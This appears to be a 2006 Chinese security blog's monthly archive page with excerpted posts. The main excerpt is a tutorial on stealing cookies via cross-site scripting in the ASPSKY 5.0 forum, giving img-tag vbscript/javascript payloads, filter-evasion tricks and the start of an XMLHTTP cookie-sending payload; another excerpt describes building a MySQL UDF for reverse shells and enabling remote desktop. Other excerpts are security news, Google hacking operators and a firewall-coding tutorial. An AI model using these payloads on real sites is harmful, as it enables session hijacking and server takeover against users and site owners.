ps:最近认识了个韩国的朋友,大家用英语交流,无奈自己英语太懒了,5555!
1. I see. 我明白了。2. I quit! 我不干了!3. Let go! 放手!4. Me too. 我也是。5. My god! 天哪!6. No way! 不行!7. Come…
Archive for 八月, 2006
来自:[url=http://s0n9.blog.sohu.com]s0n9'5 B1o9 [/url] 跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个问题:
总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句的办法勉强可以作到发送COOKIE不出现IE窗口,但是在实际使用中有时会遇到IE出错。
没有更好的办法了吗?以前在研究VBS病毒自动升级的时候用到一个Microsoft.XMLHTTP控件(该控件是WIN98/2K上都默认自带的东东,并且它是IE认为safe的控件!),通过它我们可以在网页中给网站发送http请求,可以是POST也可以是GET.
好了思路已经到这儿来,下面我们可以实战一下,我以ASPSKY 5.0 0320为例子。我们知道<IMG SRC="XXXXXXX">在SRC中可以写入vbscript:这样的语句。。
比如<img src="vbscript:a=(msgbox(now))">,但是我们只能执行一个语句
比如<img src="vbscript:a=(msgbox(now)):b=(msgbox(now))">这样都将是错误的!怎么办法呢?在VBS中我们可以用EXECUTE语句,在JS中我们可以使用EVAL语!
比如:<img src="vbscript:execute("a=(msgbox(now)):b=(msgbox("czy""))")">或是<img src="javascript:eval('alert(\'nsfocus\');alert(\'czy\')')">
还没有晕吧?上面你可能会注意到用VBS的execute语句时双引号要换为"这是因为:在VBS中单引号要括起字符串,必须是两个单引号代表一个又引号,并且在双引号内!所以在execute语句中我们不能用单引号,而直接用"呢,在HTML进行引号匹配的时候会和src="后的引号匹配,所以我们只能用"代替了。
引号的问题解决了,在实际应用中ASPSKY还会对我们的代码进行处理:1:如果发现script字串,会在前面加上一个空格中国公务网 2004-5-31 15:28:522:如果发现http字串会认为是一个URL,并在两边加上<A>元素3:如果发现空格会用 代替
解决问题:1:vbscript用vbsCript代替2:http用,""ht""+""tp…代替(vbs中引号括引号里面的应用多一对,+代表连接符)3:空格用 代替(注不是\u0014)
在最后就是发送COOKIE的问题:1:控件在本地可以GET,POST任意的网站,但是在网页中竟然只能GET,POST当前服务器。。。。要不然IE就会说拒绝仿问!2:cookie中不能有&等在URL中有特殊交意的字符
解决问题:
1:只能发给当前服务器,那么可以把COOKIE发到你在论坛上的注册的用户的邮箱嘛:)2:replace(document.cookie,""&"",""-""),在vbs中用replace替换函用,在例子中我把"&"换成了"-"
问题都解决了下面是实际的例子:动网aspsky 5.0 0320测试成功
//———————-
[IMG]vbsCript:execute("dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open…
准备睡觉来,一个朋友告诉我绿盟访问不了了,打开一看,果然是。怎么回事?抓图时间:0:05,然后说另外个朋友说的,他用神仙怕怕超级DDOS测试了下,汗!
文章作者:langouster信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹shell后由于网络原因不一会儿就断开了,造成了MYSQL当掉。my_udf.dll和Mix.dll相似,但它是通过my_udfdoor函数在服务器上侦听3306端口,用nc正向连接获得shell,但它的功能显的少了点,于是我决定自己写一个功能强大,运行稳定的UDF。 MYSQL有一个开发包,它定义了自己的接口,变量类型,以及函数执行顺序。比如我们要写一个open3389函数,我们可以这样写:
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message){//在open3389函数之前调用,一般用于初始化工作,为可选函数;//return 1出错 ,0 正常 return 0;}extern…
睡不着,爬起来又把《独自等待》看了一遍!…………
ps:Open Bug System将整合Google hack search!欢迎访问:http://www.open-bug.org
google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.google hacking其实并非如此简单…
常用的google关键字: foo1 foo2 (也就是关联,比如搜索xx公司 xx美女) operator:foo filetype:123 类型 site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息 intext:foo intitle: fooltitle…
ps:以后就不黑电脑了,那个没技术含量,要黑咱就直接黑CPU了!
来源:[21世纪安全网络--21SaFe.CoM]
据Vnunet网站8月26日报道,美国安全公司赛门铁克最近发现了两个专门针对AMD公司处理器、而不是某个操作系统的蠕虫病毒。安全专家称病毒作者正在“深入系统底层”。
这两个蠕虫针对32位版和64位版的AMD公司微处理器,赛门铁克公司称之为w32.bounds和w64.bounds。不过,该公司表示,迄今为止,尚无发现针对AMD处理器的病毒,这两个蠕虫病毒证明了“攻击CPU”的可行性,因为在早期阶段,两个蠕虫的危害程度并不大。
赛门提可公司安全响应集团的负责人维森特?魏复(Vincent Weafer)对Vnunet网站表示,虽然暂时的威胁并不大,但是这两个蠕虫是一个“出发点”,未来的黑客将会利用这个“证据”开发出更多攻击处理器而不是操作系统的病毒。
魏复说:“如果我可以深入到处理器级别,那么,将来我可以进入到核心硬件层次,我可以逃避操作系统的内核保护或者用户保护。一些病毒作者肯定会觉得做到这样的水平很值的荣耀。”
魏复表示,如果出现这种情况,病毒作者可以访问任何系统资源,他们可以说是为所欲为。
不过,这位安全专家也表示,这种方式的攻击行动将会带有一定的难度,因为在客观上,一款处理器现实中可以和很多中操作系统相配合,“讲述不同的操作系统预言”,这将会限制病毒作者的行动。
ps:这个就是ms发布漏洞补丁中的漏洞了吧!
受影响系统: Microsoft Internet Explorer 6.0 SP1 描述: ——————————————————————————– BUGTRAQ ID: 19667 CVE(CAN) ID: CVE-2006-3869
Internet Explorer是微软发布的非常流行的WEB浏览器。
Internet…
信息来源:http://www.ccw.com.cn
国外一安全机构分析师Joe Wilcox日前表示,微软的新一代操作系统Windows Vista测试版是自Windows 95以来漏洞(Bug)最多的操作系统。
据英国媒体报道,Joe Wilcox日前表示:“自从推出Windows 95,我就一直在测试微软的操作系统,而最新的Vista测试版是我见过的漏洞最多的操作系统。”
Wilcox称,前几代操作系统到了Beta 2版本时,就已经很稳定了。软件开发商甚至可以在此基础上开发应用程序了。而如今的Vista Beta 2就好像是一只行驶在狂风暴雨中的小船,随时都可能发生险情。
同时,测试人员和一些业内专家也承认,今年6月公开测试的Vista Beta 2的确漏洞百出,甚至出现蓝屏。另外,独立软件开发商也表示,尽管Vista的内存占用量已经从最初的1G降至700兆,而将来也有望继续下降,但仍然是个“庞然大物”。
尽管如此,微软并没有推出Beta 3的计划,而是在9月底直接发布RC1版本。据媒体此前报道,截至今年7月3日,Windows Vista已经曝出了27479处漏洞,目前仍有1/5尚未修复。
信息来源:http://www.chinanethack.com/
火墙主要有日志,网络状态列表,网络状态控制(如拦截)组成的。所以,我们要3个界面,一个是主界面——状态列表。一个是日志界面,一个是控制界面。打开VB新建一个工程,添加一个窗体。一共要3个窗体,2个模块。太复杂了,我也在考虑怎么写才能让大家理解。文章写的不好,还请大家包含。说下原理:一、监控 TCP连接
黑客程序或木马程序的本质是实现数据传输。TCP和UDP(用户数据文报协议)是两个最常用的数据传输协议,它们都使用设置监听端口的方法来完成数据传输。
实时监控所有端口的连接情况、及时对异常连接发出警告并提示用户删除异常连接,就可以有效地达到防黑目的。 使用微软的IP助手库函数(iphlpapi.dll)是一个捷径。其中的 GetTcpTable函数能返回当前系统中全部有效的 TCP连接。其定义为: Declare Function GetTcpTable Lib "iphlpapi.dll" (ByRef pTcpTable As MIB_TCPTABLE, ByRef pdwSize As Long,…